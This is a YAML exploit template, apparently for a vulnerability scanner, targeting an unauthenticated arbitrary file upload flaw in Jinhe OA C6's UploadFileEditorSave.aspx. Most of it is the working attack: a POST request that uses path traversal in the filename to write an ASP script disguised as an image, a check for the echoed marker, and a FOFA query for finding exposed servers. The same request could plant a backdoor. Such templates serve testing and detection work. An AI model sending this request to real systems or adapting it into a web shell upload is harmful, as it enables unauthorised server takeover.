product: 金和OA
vName: 金和OA C6 uploadfileeditorsave接口任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 金和OA C6系统UploadFileEditorSave.aspx接口处存在任意文件上传漏洞，未经身份认证的攻击者可利用此漏洞上传恶意后门文件，最终可导致服务器失陷。
version: ''
note: ''
search:
  FOFA: app="金和网络-金和OA"
protocol: http
link: https://blog.csdn.net/qq_41904294/article/details/135370780
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /C6/Control/UploadFileEditorSave.aspx?filename=\....\....\C6\52e039302a62d077.asp
      file:
        file:
          - 52e039302a62d077.jpg
          - <% response.write('95cc64dd2825f9df13ec4ad683ecf339') %>
          - image/png
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and